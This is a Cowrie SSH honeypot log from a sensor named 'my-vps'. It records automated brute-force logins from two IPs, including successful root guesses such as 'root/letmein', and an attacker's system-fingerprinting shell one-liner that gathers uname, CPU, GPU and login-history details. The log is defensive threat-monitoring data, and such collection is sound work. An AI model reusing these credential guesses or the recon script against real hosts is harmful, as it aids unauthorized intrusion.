{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57332,"dst_ip":"1.2.3.4","dst_port":22,"session":"76137f4e7da8","protocol":"ssh","message":"New connection: 212.227.125.160:57332 (1.2.3.4:22) [session: 76137f4e7da8]","sensor":"my-vps","timestamp":"2025-08-31T05:01:02.496851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:01:03.057127Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:01:03.058485Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32818,"dst_ip":"1.2.3.4","dst_port":22,"session":"a07b9978c424","protocol":"ssh","message":"New connection: 212.227.235.229:32818 (1.2.3.4:22) [session: a07b9978c424]","sensor":"my-vps","timestamp":"2025-08-31T05:01:04.801124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:01:04.802274Z","src_ip":"212.227.235.229","session":"a07b9978c424"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:01:04.924310Z","src_ip":"212.227.235.229","session":"a07b9978c424"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"1234.com","message":"login attempt [tempusr/1234.com] failed","sensor":"my-vps","timestamp":"2025-08-31T05:01:05.450366Z","src_ip":"212.227.235.229","session":"a07b9978c424"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd123","message":"login attempt [root/P@ssw0rd123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:01:05.529775Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.573423Z","src_ip":"212.227.235.229","session":"a07b9978c424"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:01:06.620550Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.621263Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.621963Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.622992Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.624393Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.625294Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.626189Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.627438Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.627951Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.628516Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.629046Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.629658Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:01:06.630258Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:01:07.207203Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:07.208063Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:07.209264Z","src_ip":"212.227.125.160","session":"76137f4e7da8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46996,"dst_ip":"1.2.3.4","dst_port":22,"session":"f50c29d62047","protocol":"ssh","message":"New connection: 212.227.235.229:46996 (1.2.3.4:22) [session: f50c29d62047]","sensor":"my-vps","timestamp":"2025-08-31T05:01:14.623399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:01:14.624251Z","src_ip":"212.227.235.229","session":"f50c29d62047"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:01:14.878637Z","src_ip":"212.227.235.229","session":"f50c29d62047"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"Password1","message":"login attempt [testuser/Password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:01:15.916409Z","src_ip":"212.227.235.229","session":"f50c29d62047"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:17.166930Z","src_ip":"212.227.235.229","session":"f50c29d62047"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40470,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b443a8ae1e1","protocol":"ssh","message":"New connection: 212.227.235.229:40470 (1.2.3.4:22) [session: 2b443a8ae1e1]","sensor":"my-vps","timestamp":"2025-08-31T05:01:22.657662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:01:22.658738Z","src_ip":"212.227.235.229","session":"2b443a8ae1e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:01:22.930634Z","src_ip":"212.227.235.229","session":"2b443a8ae1e1"}
{"eventid":"cowrie.login.failed","username":"repository","password":"repository","message":"login attempt [repository/repository] failed","sensor":"my-vps","timestamp":"2025-08-31T05:01:24.057824Z","src_ip":"212.227.235.229","session":"2b443a8ae1e1"}
{"eventid":"cowrie.session.closed","duration":"29.8","message":"Connection lost after 29.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:25.256778Z","src_ip":"212.227.125.160","session":"8fc312c33a88"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:25.333742Z","src_ip":"212.227.235.229","session":"2b443a8ae1e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46222,"dst_ip":"1.2.3.4","dst_port":22,"session":"815b44c597ee","protocol":"ssh","message":"New connection: 212.227.235.229:46222 (1.2.3.4:22) [session: 815b44c597ee]","sensor":"my-vps","timestamp":"2025-08-31T05:01:41.566092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:01:42.334967Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:01:42.335973Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46360,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cdcd62d8286","protocol":"ssh","message":"New connection: 212.227.235.229:46360 (1.2.3.4:22) [session: 8cdcd62d8286]","sensor":"my-vps","timestamp":"2025-08-31T05:01:47.839015Z"}
{"eventid":"cowrie.login.success","username":"root","password":"letmein","message":"login attempt [root/letmein] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:01:48.097084Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.428092Z","src_ip":"212.227.235.229","session":"f74acf6b9881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:01:49.549475Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.550359Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.550857Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.551883Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.552965Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.553759Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.554590Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.555794Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.556331Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.556944Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
